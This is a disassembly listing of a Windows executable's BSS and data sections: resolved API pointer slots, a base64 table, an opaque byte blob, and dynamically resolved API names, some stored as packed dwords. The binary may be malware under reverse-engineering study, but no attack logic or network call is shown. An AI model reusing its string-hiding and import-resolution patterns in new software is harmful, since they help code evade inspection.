jmp ds:dword_44D0DC
sub_444D34 endp
; ---------------------------------------------------------------------------
align 10h
_text ends
; Section 5. (virtual address 00045000)
; Virtual size : 00005BD8 ( 23512.)
; Section size in file : 00005BD8 ( 23512.)
; Offset to raw data for section: 00045000
; Flags C0000080: Bss Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Uninitialized
; Segment permissions: Read/Write
_bss segment para public 'BSS' use32
assume cs:_bss
;org 445000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
dword_445000 dd 77E77EF1h ; DATA XREF: sub_43C65F+D�r
; sub_442373+130�w
dword_445004 dd 77D46254h ; DATA XREF: sub_43F984+15�r
; sub_43F984+74�r ...
dword_445008 dd 77E73628h ; DATA XREF: sub_43BAE4+48C�r
; sub_442373+A4�w ...
dword_44500C dd 77E79924h ; DATA XREF: sub_43C65F+41�r
; sub_442373+168�w
dword_445010 dd 77E778C5h ; DATA XREF: sub_440151+1A�r
; sub_44025A+18�r ...
dword_445014 dd 77D4702Fh ; DATA XREF: sub_43C520+5A�r
; sub_43C520+134�r ...
dword_445018 dd 0 ; DATA XREF: sub_43D966+E5�w
; sub_443EA2+17A�r
dword_44501C dd 76C693F0h ; DATA XREF: sub_43B725+1AC�r
; sub_43C8E3+57�w
dword_445020 dd 73D9E65Ch ; DATA XREF: sub_43A503+2B6�r
; sub_43A503+3C7�r ...
dword_445024 dd 0 ; DATA XREF: sub_43CA79+E9�w
; sub_440E84+1ED�r
dword_445028 dd 77E78B82h ; DATA XREF: sub_43B4DD+DF�r
; sub_43B609+C4�r ...
dword_44502C dd 77F82D5Ch ; DATA XREF: sub_4407DD+5C�r
; sub_442373+280�w
dword_445030 dd 73D9ADFAh ; DATA XREF: sub_43BF7B+122�r
; sub_43BF7B+14F�r ...
dword_445034 dd 77E6AD34h ; DATA XREF: sub_442373+1BC�w
dword_445038 dd 77121651h ; DATA XREF: sub_43A503+17�r
; sub_43FA07+36�r ...
dword_44503C dd 77DD23D7h ; DATA XREF: sub_43F5B9+3E�r
; sub_441D52+66�w
dword_445040 dd 77D47EC7h ; DATA XREF: sub_4418ED+1EE�w
dword_445044 dd 77121680h ; DATA XREF: sub_43A503+224�r
; sub_43A503+23E�r ...
dword_445048 dd 77D5264Ah ; DATA XREF: sub_43F211+25�r
; sub_4418ED+309�w
dword_44504C dd 0 ; DATA XREF: sub_43CBF8+557�r
; sub_43D966+87�w
dword_445050 dd 77D441F2h ; DATA XREF: sub_43F328+260�r
; sub_4418ED+BA�w
dword_445054 dd 73D9BBAAh ; DATA XREF: sub_43BAE4+37A�r
; sub_43D966+205�r ...
align 10h
dword_445060 dd 0 ; DATA XREF: sub_43D2F7+F2�r
; sub_43DCAC+A3�r ...
dd 3E7h dup(0)
dword_446000 dd 77E78C17h ; DATA XREF: sub_43A324+E0�r
; sub_442373+344�w
dword_446004 dd 77E75E67h ; DATA XREF: sub_43BF7B+2CE�r
; sub_440E84+2A4�r ...
dword_446008 dd 77E79908h ; DATA XREF: sub_43D5B5+372�w
; sub_43DF30+18�r ...
dword_44600C dd 77E62D7Ah ; DATA XREF: sub_442373+34�w
dword_446010 dd 77D5C2CCh ; DATA XREF: sub_43F984+32�r
; sub_4418ED+D6�w
align 10h
dword_446020 dd 40h dup(0) ; DATA XREF: sub_43D2F7+182�o
; sub_43D2F7+1F6�o ...
dword_446120 dd 77C724ACh ; DATA XREF: sub_43F328+12F�r
; sub_440281+69�w
align 10h
dword_446130 dd 0 ; DATA XREF: sub_43D2F7:loc_43D317�r
; sub_43D2F7+57�w ...
dd 3E7h dup(0)
dword_4470D0 dd 771C6F69h ; DATA XREF: sub_43C6BA+38�r
; sub_4408F1+82�w
dword_4470D4 dd 77E6869Bh ; DATA XREF: sub_43A324+FA�r
; sub_442373+360�w
dword_4470D8 dd 771C16BAh ; DATA XREF: sub_4408F1+9E�w
dword_4470DC dd 77D4DC11h ; DATA XREF: sub_43F328+16B�r
; sub_4418ED+20A�w
dword_4470E0 dd 77E684C6h ; DATA XREF: sub_43BAE4+45E�r
; sub_442373+14C�w
align 10h
dword_4470F0 dd 41h dup(0) ; DATA XREF: sub_43B8FD+13�o
; sub_43D966+43�o ...
dword_4471F4 dd 73D9E660h ; DATA XREF: sub_43F616+1B9�w
; sub_442961+483�r ...
dword_4471F8 dd 77E7A5FDh ; DATA XREF: sub_43C8E3+51�r
; sub_43D5B5+2DC�w ...
align 10h
byte_447200 db 0 ; DATA XREF: sub_43D2F7+FB�r
; sub_43DCAC+9A�r ...
align 4
dd 0F9h dup(0)
dword_4475E8 dd 77E79F93h ; DATA XREF: sub_43C8E3+D�r
; sub_43E2B0+4FD�r ...
dword_4475EC dd 77DD22EAh ; DATA XREF: sub_43F5B9+1D�r
; sub_441D52+4A�w
dword_4475F0 dd 77D4456Bh ; DATA XREF: sub_4418ED+F2�w
dword_4475F4 dd 77E7513Ch ; DATA XREF: sub_440A86+127�r
; sub_442373+4B6�w
dword_4475F8 dd 77D49951h ; DATA XREF: sub_43E2B0+E44�r
; sub_43E2B0+E94�r ...
dword_4475FC dd 77E704FCh ; DATA XREF: sub_43B4DD+17�r
; sub_43B609+17�r ...
dword_447600 dd 76C69891h ; DATA XREF: sub_43B725+185�r
; sub_4400F6+54�w
dword_447604 dd 0 ; DATA XREF: sub_43C9B7+3�o
; sub_43C9B7+E�r ...
dword_447608 dd 77E78EAAh ; DATA XREF: sub_43BF7B+44�r
; sub_43BF7B+2E8�r ...
dword_44760C dd 200B2h ; DATA XREF: sub_43F328+1E1�w
dword_447610 dd 0E800h ; DATA XREF: sub_43B725:loc_43B8D7�r
; sub_43F328+207�w
dword_447614 dd 77D46F5Bh ; DATA XREF: sub_44184C+13�r
; sub_4418ED+82�w
dword_447618 dd 77E79A45h ; DATA XREF: sub_43B8FD+16F�r
; sub_43B8FD+1B3�r ...
dword_44761C dd 0 ; DATA XREF: sub_43BAE4+2F1�w
; sub_43BAE4+39F�w ...
dword_447620 dd 771C1E56h ; DATA XREF: sub_43C6BA+51�r
; sub_4408F1+66�w
align 10h
dword_447630 dd 0 ; DATA XREF: sub_43A324+D2�w
; sub_43A324+12E�w ...
dd 0FEh dup(0)
dword_447A2C dd 73D9C489h ; DATA XREF: sub_43F616+BA�w
dword_447A30 dd 0 ; DATA XREF: sub_43D966+CF�w
dword_447A34 dd 77E79881h ; DATA XREF: sub_43DC1A+5A�r
; sub_440C54+D3�r ...
dword_447A38 dd 73D9C4C5h ; DATA XREF: sub_43F616+9E�w
dword_447A3C dd 77E777EFh ; DATA XREF: sub_43BACD+8�r
; sub_43C9B7+8�r ...
dword_447A40 dd 77D48137h ; DATA XREF: sub_43CBF8+6E�r
; sub_43CBF8+A3�r ...
dword_447A44 dd 77414CDCh ; DATA XREF: sub_43C2E5+2C�r
; sub_43CA79+22�r ...
align 10h
word_447A50 dw 0 ; DATA XREF: sub_43DCAC:loc_43DD31�r
; sub_43DCAC:loc_43DD6D�r ...
align 4
dd 1F3h dup(0)
dword_448220 dd 77D47EE5h ; DATA XREF: sub_43F328+110�r
; sub_4418ED+19A�w
dword_448224 dd 77D49A11h ; DATA XREF: sub_43CBF8+54A�r
; sub_4418ED+9E�w
dword_448228 dd 0 ; DATA XREF: sub_43D966+C4�w
; sub_4402F1:loc_44037D�r
align 10h
dword_448230 dd 5 dup(0) ; DATA XREF: sub_43D966+B4�o
; sub_4402F1+163�o ...
dword_448244 dd 77E805D8h ; DATA XREF: sub_43C8E3+28�r
; sub_43F616+28�r ...
dword_448248 dd 77E7980Ah ; DATA XREF: sub_43A4EC+F�r
; sub_442373+1F4�w
dword_44824C dd 73DA018Fh ; DATA XREF: sub_43F616+19A�w
dword_448250 dd 77C7F85Ah ; DATA XREF: sub_43E2B0+7BE�r
; sub_43E2B0+9C7�r ...
dword_448254 dd 77132EF6h ; DATA XREF: sub_43A503+36�r
; sub_43FA07+60�r ...
dword_448258 dd 77E75D9Eh ; DATA XREF: sub_43BF7B+270�r
; sub_440E84+43�r ...
dword_44825C dd 77E61608h ; DATA XREF: sub_43CA79+2C�r
; sub_442373+264�w
dword_448260 dd 41h dup(0) ; DATA XREF: sub_43D966+6B�o
; sub_43D966+DF�o ...
dword_448364 dd 77E6BD13h ; DATA XREF: sub_442373+37C�w
; sub_442961+13CE�r
dword_448368 dd 77D44200h ; DATA XREF: sub_43F328+280�r
; sub_4418ED+10E�w
align 10h
dword_448370 dd 0 ; DATA XREF: sub_43C6BA+1E�w
; sub_43CBF8+589�w ...
dword_448374 dd 0 ; DATA XREF: sub_43CBF8+56F�r
; sub_43E2B0+4C5�w ...
dword_448378 dd 0 ; DATA XREF: sub_43CBF8+131�r
; sub_43CBF8+543�r ...
dword_44837C dd 0 ; DATA XREF: sub_43CBF8+651�r
; sub_43E2B0+86A�w ...
dword_448380 dd 0 ; DATA XREF: sub_43CBF8+51�r
; sub_43CBF8+19F�r ...
dword_448384 dd 0 ; DATA XREF: sub_43CBF8+67�r
; sub_43CBF8+86�r ...
dword_448388 dd 0 ; DATA XREF: sub_43CBF8+9C�r
; sub_43CBF8+307�r ...
dword_44838C dd 0 ; DATA XREF: sub_43CBF8+ED�r
; sub_43E2B0+DCF�w ...
dword_448390 dd 0 ; DATA XREF: sub_43CBF8+5CD�r
; sub_43E2B0+E22�w
dword_448394 dd 0 ; DATA XREF: sub_43CBF8+604�r
; sub_43E2B0+E72�w
dword_448398 dd 0 ; DATA XREF: sub_43CBF8+638�r
; sub_43E2B0+EC2�w
dword_44839C dd 0 ; DATA XREF: sub_43CBF8+66C�r
; sub_43E2B0+F12�w
dd 4A4h dup(0)
dword_449630 dd 77E79E34h ; DATA XREF: sub_43FF8E+14�r
; sub_442373+210�w
dword_449634 dd 73D9D340h ; DATA XREF: sub_43C35B+A8�r
; sub_43F616+F2�w ...
dword_449638 dd 77E7A099h ; DATA XREF: sub_442373+3D0�w
dword_44963C dd 0 ; DATA XREF: sub_43D966+DA�w
; sub_443EA2+168�r
dword_449640 dd 73D9D5E0h ; DATA XREF: sub_43C35B+9A�r
; sub_43F616+10E�w ...
dword_449644 dd 77E8074Ah ; DATA XREF: sub_44017A+6B�r
; sub_442373+3B4�w
dword_449648 dd 77D414D4h ; DATA XREF: sub_43E2B0+55E�r
; sub_43E2B0+68A�r ...
dword_44964C dd 77F7E300h ; DATA XREF: sub_43D5B5+38A�w
; sub_43DF30+D5�r ...
dword_449650 dd 77E77963h ; DATA XREF: sub_43A324+90�r
; sub_43B4DD+EC�r ...
align 10h
dword_449660 dd 0 ; DATA XREF: sub_43D2F7+2A�r
; sub_44118A+450�r ...
dd 3E7h dup(0)
dword_44A600 dd 73D9DBA2h ; DATA XREF: sub_43F616+146�w
dword_44A604 dd 77D444F0h ; DATA XREF: sub_4418ED+25E�w
dword_44A608 dd 0 ; DATA XREF: sub_442373+1A0�w
dword_44A60C dd 77D5BA26h ; DATA XREF: sub_43CBF8+5D4�r
; sub_43CBF8+60B�r ...
off_44A610 dd offset byte_41A00D ; DATA XREF: sub_43B725+1B8�r
; sub_43F328+1FC�w
dword_44A614 dd 77E681EFh ; DATA XREF: sub_440A86+DB�r
; sub_442373+440�w ...
dword_44A618 dd 77DD189Ah ; DATA XREF: sub_43F5B9+49�r
; sub_441D52+85�w
dword_44A61C dd 77E7C2C4h ; DATA XREF: sub_43F328+E0�r
; sub_442373+398�w
dword_44A620 dd 77D4A102h ; DATA XREF: sub_43F328+120�r
; sub_4418ED+1B6�w
dword_44A624 dd 77E793EFh ; DATA XREF: sub_43DC1A+4C�r
; sub_442373+114�w ...
dword_44A628 dd 77D43FEDh ; DATA XREF: sub_43E2B0+E16�r
; sub_43E2B0+E66�r ...
dword_44A62C dd 0 ; DATA XREF: sub_43A503+D88�r
; sub_43D966+7C�w
dword_44A630 dd 73D92B86h ; DATA XREF: sub_43A324+33�r
; sub_43A324+1A3�r ...
dword_44A634 dd 73D9E5C5h ; DATA XREF: sub_43A324+49�r
; sub_43A503+3B3�r ...
dword_44A638 dd 77D651AFh ; DATA XREF: sub_43C520+23�r
; sub_43C520+43�r ...
dword_44A63C dd 77E77CCEh ; DATA XREF: sub_4402F1+1BD�r
; sub_442373+184�w
dword_44A640 dd 77D6ADD7h ; DATA XREF: sub_43CBF8+1E9�r
; sub_43CBF8+29A�r ...
dword_44A644 dd 7720C039h ; DATA XREF: sub_43DB9F+12�r
; sub_43DB9F+32�r ...
dword_44A648 dd 73D9D320h ; DATA XREF: sub_43F616+D6�w
; sub_4407DD+EF�r
dword_44A64C dd 77E6C9E0h ; DATA XREF: sub_43A324+7A�r
; sub_442373+328�w
dword_44A650 dd 77D45F74h ; DATA XREF: sub_43E2B0+4F5�r
; sub_4418ED+162�w
dword_44A654 dd 77D5BB6Ch ; DATA XREF: sub_43CBF8+4E5�r
; sub_4418ED+296�w
dword_44A658 dd 77D47D27h ; DATA XREF: sub_43CBF8+576�r
; sub_43E2B0+4E2�r ...
dword_44A65C dd 77F7E21Fh ; DATA XREF: sub_43D5B5+35A�w
; sub_43DF30+69�r ...
dword_44A660 dd 77E73C49h ; DATA XREF: sub_43BF7B+59�r
; sub_43F328+63�r ...
dword_44A664 dd 77E6C0E3h ; DATA XREF: sub_43A324+A2�r
; sub_43BF7B+92�r ...
align 10h
dword_44A670 dd 40h dup(0) ; DATA XREF: sub_43BAE4+387�o
; sub_43D966+EA�o ...
dword_44A770 dd 77E7751Ah ; DATA XREF: sub_43D2F7+C�r
; sub_44118A:loc_4415A2�r ...
dword_44A774 dd 0 ; DATA XREF: sub_43D966+92�w
; sub_43E2B0+3CE�r
dword_44A778 dd 77E79424h ; DATA XREF: sub_440E84+11C�r
; sub_442373+478�w
dword_44A77C dd 77D43DD3h ; DATA XREF: sub_43F328+256�r
; sub_4418ED+2CE�w
dword_44A780 dd 77E71702h ; DATA XREF: sub_440E84+D1�r
; sub_442373+45C�w
dword_44A784 dd 0 ; DATA XREF: sub_43E299+3�o
; sub_43E299+E�r ...
dword_44A788 dd 77E7A837h ; DATA XREF: sub_43B4DD+96�r
; sub_43B609+9A�r ...
align 10h
dword_44A790 dd 0 ; DATA XREF: sub_43A324:loc_43A334�w
; sub_43A324+52�r ...
dd 0FEh dup(0)
dword_44AB8C dd 77E79D8Ch ; DATA XREF: sub_43BAE4+443�r
; sub_43E013+D4�r ...
dword_44AB90 dd 77E7AC37h ; DATA XREF: sub_43A324+178�r
; sub_43D5B5+342�w ...
align 8
dword_44AB98 dd 77E7C657h ; DATA XREF: sub_440A86+22�r
; sub_442373+494�w
dword_44AB9C dd 77E78C81h ; DATA XREF: sub_43B4DD+C1�r
; sub_43F242+4F�r ...
dword_44ABA0 dd 771214E8h ; DATA XREF: sub_43A503+F5�r
; sub_43A503+558�r ...
dword_44ABA4 dd 77D5C13Ah ; DATA XREF: sub_43C941+1F�r
; sub_43CBF8+138�r ...
dword_44ABA8 dd 0 ; DATA XREF: sub_43BACD+3�o
; sub_43BACD+E�r ...
dword_44ABAC dd 73D9DBAFh ; DATA XREF: sub_43F616+12A�w
; sub_441E11+163�r ...
dword_44ABB0 dd 7712151Dh ; DATA XREF: sub_44118A+664�r
; sub_441C26+82�w
dword_44ABB4 dd 771C69DCh ; DATA XREF: sub_4408F1+4A�w
align 10h
dword_44ABC0 dd 77FC5460h, 0FFFFFFFFh, 4 dup(0) ; DATA XREF: sub_43DF30+13�o
; sub_43DF30+64�o ...
_bss ends
; Section 6. (virtual address 0004B000)
; Virtual size : 00001A00 ( 6656.)
; Section size in file : 00001A00 ( 6656.)
; Offset to raw data for section: 0004B000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_data segment para public 'DATA' use32
assume cs:_data
;org 44B000h
off_44B000 dd offset sub_444C34 ; DATA XREF: .text:0043A1B5�r
dword_44B004 dd 0 ; DATA XREF: sub_43A1C3+4A�w
; sub_43A1C3+64�r
dword_44B008 dd 0 ; DATA XREF: sub_43A1C3+38�w
dword_44B00C dd 0 ; DATA XREF: sub_43A1C3+5F�w
; sub_43A1C3:loc_43A23C�r
dword_44B010 dd 0 ; DATA XREF: sub_43A25C+57�w
align 8
dd 7325h
aWr: ; DATA XREF: sub_43A1C3+3D�o
; sub_43A1C3+4F�o ...
unicode 0, <wr>,0
align 4
dd 4 dup(0)
dword_44B034 dd 0 ; DATA XREF: .text:0043A0F2�w
dword_44B038 dd 0 ; DATA XREF: .text:0043A0FC�w
; .text:0043A117�r ...
dword_44B03C dd 0 ; DATA XREF: .text:0043A104�w
dword_44B040 dd 14h dup(0) ; DATA XREF: .text:0043A111�o
; .text:0043A11F�o
word_44B090 dw 2 ; DATA XREF: sub_43A503+316�r
; sub_43B2DF+102�r ...
align 4
dword_44B094 dd 0 ; DATA XREF: sub_43A503+42F�r
; sub_43B2DF+C4�r ...
dword_44B098 dd 5 ; DATA XREF: sub_43A503+523�r
; sub_43A503+79D�r ...
dword_44B09C dd 3 ; DATA XREF: sub_43A324+107�r
; sub_43A503+43D�r ...
word_44B0A0 dw 5 ; DATA XREF: sub_43A503+43�r
; sub_43A503+B05�r ...
align 4
word_44B0A4 dw 5 ; DATA XREF: sub_43A324+5C�r
; sub_43A324+C8�r ...
align 4
dword_44B0A8 dd 4 ; DATA XREF: sub_43A324+125�r
; sub_43A503+209�r ...
dword_44B0AC dd 2 ; DATA XREF: sub_43A503+59D�r
; sub_43A503+BF1�r ...
dword_44B0B0 dd 5 ; DATA XREF: sub_43A503+13C�r
; sub_43A503+619�r ...
word_44B0B4 dw 5 ; DATA XREF: sub_43A324+18F�r
; sub_43B2DF+D9�r ...
align 4
word_44B0B8 dw 2 ; DATA XREF: sub_43A503+9B7�r
; sub_43A503+BE8�r ...
align 4
dword_44B0BC dd 1 ; DATA XREF: sub_43A503+6CA�r
; sub_43A503+A3C�r ...
dword_44B0C0 dd 3 ; DATA XREF: sub_43A503+81C�r
; sub_43B4DD+A3�r ...
dword_44B0C4 dd 4 ; DATA XREF: sub_43A503+3E�r
; sub_43A503+48C�r ...
dword_44B0C8 dd 4 ; DATA XREF: sub_43A503+693�r
; sub_43A503+7EF�r ...
word_44B0CC dw 7 ; DATA XREF: sub_43A503+858�r
; sub_43A503+BC2�r ...
align 10h
dword_44B0D0 dd 0 ; DATA XREF: sub_43A503+172�r
; sub_43A503+6C0�r ...
dword_44B0D4 dd 0 ; DATA XREF: sub_43A503+1F0�r
; sub_43A503+3FE�r ...
dword_44B0D8 dd 3 ; DATA XREF: sub_43A503+372�r
; sub_43A503+5E1�r ...
dword_44B0DC dd 8 ; DATA XREF: sub_43B43E+12�r
; sub_43B725+15C�r ...
word_44B0E0 dw 8 ; DATA XREF: sub_43A503+BD�r
; sub_43A503+1F5�r ...
align 4
word_44B0E4 dw 6 ; DATA XREF: sub_43A503+B84�r
; sub_43B4DD+F2�r ...
align 4
dword_44B0E8 dd 6 ; DATA XREF: sub_43C6BA+E6�r
; sub_43C941+4A�r ...
dword_44B0EC dd 0 ; DATA XREF: sub_43A503+2D�r
; sub_43A503+9BE�r ...
word_44B0F0 dw 5 ; DATA XREF: sub_43A324:loc_43A34C�r
; sub_43A324+169�r ...
align 4
word_44B0F4 dw 0 ; DATA XREF: sub_43A324+100�r
; sub_43A503+65A�r ...
align 4
dword_44B0F8 dd 7 ; DATA XREF: sub_43A324+14C�r
; sub_43A503+294�r ...
dword_44B0FC dd 3 ; DATA XREF: sub_43A503+1A5�r
; sub_43A503+587�r ...
dword_44B100 dd 3 ; DATA XREF: sub_43A503+714�r
; sub_43B4DD+104�r ...
dword_44B104 dd 2 ; DATA XREF: sub_43A324+63�r
; sub_43A503+8E2�r ...
word_44B108 dw 5 ; DATA XREF: sub_43A324+196�r
; sub_43B4DD+D0�r ...
align 4
dword_44B10C dd 3 ; DATA XREF: sub_43A503+3E5�r
; sub_43A503+982�r ...
dword_44B110 dd 8 ; DATA XREF: sub_43A503+60C�r
; sub_43A503+745�r ...
word_44B114 dw 3 ; DATA XREF: sub_43B2DF+92�r
; sub_43B2DF+BD�r ...
align 4
word_44B118 dw 9 ; DATA XREF: sub_43A324+162�r
; sub_43A503+B6�r ...
align 4
word_44B11C dw 2 ; DATA XREF: sub_43A503+19E�r
; sub_43A503+76F�r ...
align 10h
word_44B120 dw 8 ; DATA XREF: sub_43A503+8D�r
; sub_43A503+7E8�r ...
align 4
dword_44B124 dd 2 ; DATA XREF: sub_43A503+873�r
; sub_43A503+B3E�r ...
dword_44B128 dd 0 ; DATA XREF: sub_43A503+8B8�r
; sub_43A503:loc_43AF58�r ...
word_44B12C dw 4 ; DATA XREF: sub_43A503+B44�r
; sub_43B609+81�r ...
align 10h
word_44B130 dw 4 ; DATA XREF: sub_43A503+3EA�r
; sub_43A503+434�r ...
align 4
dword_44B134 dd 4 ; DATA XREF: sub_43A503+340�r
; sub_43A503+594�r ...
dword_44B138 dd 2 ; DATA XREF: sub_43A503+1CB�r
; sub_43A503+76A�r ...
word_44B13C dw 7 ; DATA XREF: sub_43A324+11E�r
; sub_43A503+565�r ...
align 10h
word_44B140 dw 7 ; DATA XREF: sub_43B725+109�r
; sub_43BAE4+5A�r ...
align 4
dword_44B144 dd 0 ; DATA XREF: sub_43A503+88�r
; sub_43A503+16D�r ...
dword_44B148 dd 2 ; DATA XREF: sub_43A503+4F6�r
; sub_43A503+51E�r ...
word_44B14C dw 4 ; DATA XREF: sub_43A503+141�r
; sub_43A503+AE7�r ...
align 10h
dword_44B150 dd 1 ; DATA XREF: sub_43DF30+A�r
; sub_43DF30+1E�w ...
dword_44B154 dd 77E60000h ; DATA XREF: sub_43D5B5+2D6�w
; sub_43D5B5+336�r ...
dword_44B158 dd 73D90000h ; DATA XREF: sub_43F616+13�w
; sub_43F616+2E�w ...
dword_44B15C dd 77D40000h ; DATA XREF: sub_4418ED+13�w
; sub_4418ED+2E�w ...
dword_44B160 dd 77C70000h ; DATA XREF: sub_440281+13�w
; sub_440281+2E�w ...
dword_44B164 dd 771B0000h ; DATA XREF: sub_4408F1+13�w
; sub_4408F1+2E�w ...
dword_44B168 dd 77120000h ; DATA XREF: sub_441C26+13�w
; sub_441C26+2E�w ...
dword_44B16C dd 76BB0000h ; DATA XREF: sub_43B725:loc_43B898�r
; sub_4400F6+13�w ...
dword_44B170 dd 76C60000h ; DATA XREF: sub_43B725+191�r
; sub_43C8E3+13�w ...
dword_44B174 dd 773D0000h ; DATA XREF: sub_43FF3C+13�w
; sub_43FF3C+2E�w ...
dword_44B178 dd 77DD0000h ; DATA XREF: sub_441D52+13�w
; sub_441D52+2E�w ...
off_44B17C dd offset aAbcdefghijklmn ; DATA XREF: sub_43DE83:loc_43DEF4�r
; "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklm"...
dword_44B180 dd 0E860h, 0E9610000h, 2 dup(0) ; DATA XREF: sub_442961+95D�o
dword_44B190 dd 11h, 0Fh dup(0) ; DATA XREF: sub_441DDE+8�o
dword_44B1D0 dd 0E1F7EEA5h, 0BFFD7E2Ch, 869AE87Fh, 0CC244082h, 0D76ADDE2h
; DATA XREF: sub_441DDE+3�o
dd 1B77E1E1h, 505215B0h, 0D24B6456h, 3D357C6Bh, 280E85D5h
dd 1AB051F9h, 1E4E8744h, 0E383CCDFh, 323D4737h, 14F80518h
dd 6E0637BFh
dword_44B210 dd 0 ; DATA XREF: sub_43BAE4+309�w
; sub_43BAE4+3B4�w ...
off_44B214 dd offset sub_43DB9F ; DATA XREF: sub_44118A+5F0�o
dd offset sub_43E299
dd offset sub_441BFD
dd offset sub_43BABD
dd offset sub_43BAC5
dd offset sub_4408E9
dd offset sub_43DCAC
dword_44B230 dd 0 ; DATA XREF: sub_43D966+F0�w
; sub_43FA07+10�r ...
off_44B234 dd offset sub_4440CD ; DATA XREF: .data:off_44B250�o
dd offset sub_43BACD
dd offset sub_440151
dd offset sub_442959
dd offset sub_43F209
dd offset sub_4418E5
dd offset sub_43CBA8
off_44B250 dd offset off_44B234 ; DATA XREF: sub_43C6BA+12E�o
; sub_43FFAA+C1�o
dword_44B254 dd 0 ; DATA XREF: sub_43C6BA+3E�o
; sub_43C6BA+76�r ...
off_44B258 dd offset sub_44186A ; DATA XREF: .data:off_44B274�o
dd offset sub_43C9B7
dd offset sub_44025A
dd offset sub_43C34B
dd offset sub_43C353
dd offset sub_442830
dd offset sub_43FFAA
off_44B274 dd offset off_44B258 ; DATA XREF: sub_43C6BA:loc_43C873�o
dword_44B278 dd 0FFFFFFFFh ; DATA XREF: sub_43B2DF+35�r
dd 2Ah dup(0FFFFFFFFh), 3Eh, 3 dup(0FFFFFFFFh), 3Fh, 34h
dd 35h, 36h, 37h, 38h, 39h, 3Ah, 3Bh, 3Ch, 3Dh, 7 dup(0FFFFFFFFh)
dd 0
dd 1, 2, 3, 4, 5, 6, 7, 8, 9, 0Ah, 0Bh, 0Ch, 0Dh, 0Eh
dd 0Fh, 10h, 11h, 12h, 13h, 14h, 15h, 16h, 17h, 18h, 19h
dd 6 dup(0FFFFFFFFh), 1Ah, 1Bh, 1Ch, 1Dh, 1Eh, 1Fh, 20h
dd 21h, 22h, 23h, 24h, 25h, 26h, 27h, 28h, 29h, 2Ah, 2Bh
dd 2Ch, 2Dh, 2Eh, 2Fh, 30h, 31h, 32h, 33h, 85h dup(0FFFFFFFFh)
off_44B678 dd offset loc_43B34A ; DATA XREF: sub_43B2DF+64�r
dd offset loc_43B352
dd offset loc_43B396
dd offset loc_43B3DB
aCreatethread db 'CreateThread',0 ; DATA XREF: sub_43D5B5+2E8�o
aEntercriticals db 'EnterCriticalSection',0 ; DATA XREF: sub_43D5B5+2FB�o
aInitializecrit db 'InitializeCriticalSection',0 ; DATA XREF: sub_43D5B5+30E�o
aLeavecriticals db 'LeaveCriticalSection',0 ; DATA XREF: sub_43D5B5+322�o
align 4
dword_44B6DC dd 0AB8E0004h, 0D6B6BEh ; DATA XREF: sub_444148+6D�o
dword_44B6E4 dd 4, 2E006Ch, 280023h, 35h ; DATA XREF: sub_443EA2+27�o
dword_44B6F4 dd 0A8860004h, 0F5EAE8h ; DATA XREF: sub_443DC1+56�o
dword_44B6FC dd 0DF830001h ; DATA XREF: sub_443DC1+2A�o
db 0
byte_44B701 db 2 dup(0), 84h ; DATA XREF: sub_442961+77B�o
a_data db '.data',0
word_44B70A dw 0 ; DATA XREF: sub_442373+499�o
aGetlocaleinfoa db 'GetLocaleInfoA',0
dword_44B71C dd 47D90000h, 65567465h, 6F697372h, 4178456Eh ; DATA XREF: sub_442373+47D�o
db 0
byte_44B72D db 2 dup(0), 89h ; DATA XREF: sub_442373+461�o
aFiletimetosyst db 'FileTimeToSystemTime',0
byte_44B745 db 2 dup(0), 8Eh ; DATA XREF: sub_442373+445�o
aComparefiletim db 'CompareFileTime',0
dword_44B758 dd 47CD0000h, 6F567465h, 656D756Ch, 6F666E49h, 74616D72h
; DATA XREF: sub_442373+429�o
dd 416E6F69h
db 0
byte_44B771 db 2 dup(0), 93h ; DATA XREF: sub_442373+40D�o
aInterlockeddec db 'InterlockedDecrement',0
byte_44B789 db 2 dup(0), 7Ah ; DATA XREF: sub_442373+3F1�o
aInterlockedinc db 'InterlockedIncrement',0
byte_44B7A1 db 2 dup(0), 0C5h ; DATA XREF: sub_442373+3D5�o
aGetsystemdirec db 'GetSystemDirectoryA',0
dword_44B7B8 dd 47760000h, 6F4D7465h, 656C7564h, 656C6946h, 656D614Eh
; DATA XREF: sub_442373+3B9�o
db 41h, 0
word_44B7CE dw 0 ; DATA XREF: sub_442373+39D�o
a9openmutexa db '9OpenMutexA',0
dword_44B7DC dd 43AF0000h, 74616572h, 74754D65h, 417865h ; DATA XREF: sub_442373+381�o
dword_44B7EC dd 43540000h, 4679706Fh, 41656C69h ; DATA XREF: sub_442373+365�o
db 0
byte_44B7F9 db 2 dup(0), 90h ; DATA XREF: sub_442373+349�o
aGetdiskfreespa db 'GetDiskFreeSpaceA',0
word_44B80E dw 0 ; DATA XREF: sub_442373+32D�o
aRseterrormode db 'SetErrorMode',0
word_44B81E dw 0 ; DATA XREF: sub_442373+311�o
aGetexitcodethr db '%GetExitCodeThread',0
byte_44B833 db 0 ; DATA XREF: sub_442373+2F5�o
dd 65471700h, 69724474h, 79546576h, 416570h
dword_44B844 dd 46C70000h, 43646E69h, 65736F6Ch ; DATA XREF: sub_442373+2D9�o
db 0
byte_44B851 db 2 dup(0), 38h ; DATA XREF: sub_442373+2BD�o
aFindnextfilea db 'FindNextFileA',0
word_44B862 dw 0 ; DATA XREF: sub_442373+2A1�o
aIfindfirstfile db 'FindFirstFileA',0
dword_44B874 dd 47E90000h, 69547465h, 6F436B63h, 746E75h ; DATA XREF: sub_442373+285�o
dword_44B884 dd 52350000h, 655A6C74h, 654D6F72h, 79726F6Dh ; DATA XREF: sub_442373+269�o
db 0
byte_44B895 db 2 dup(0), 89h ; DATA XREF: sub_442373+24D�o
aGetsystemtime db 'GetSystemTime',0
word_44B8A6 dw 0 ; DATA XREF: sub_442373+231�o
aRlocalfree db 'LocalFree',0
byte_44B8B3 db 0 ; DATA XREF: sub_442373+215�o
dd 6F4C0800h, 416C6163h, 636F6C6Ch
db 0
byte_44B8C1 db 2 dup(0), 1Dh ; DATA XREF: sub_442373+1F9�o
aVirtualfree_0 db 'VirtualFree',0
dword_44B8D0 dd 567C0000h, 75747269h, 6C416C61h, 636F6Ch ; DATA XREF: sub_442373+1DD�o
dword_44B8E0 dd 529B0000h, 46646165h, 656C69h ; DATA XREF: sub_442373+1C1�o
dword_44B8EC dd 473B0000h, 65547465h, 6150706Dh, 416874h ; DATA XREF: sub_442373+1A5�o
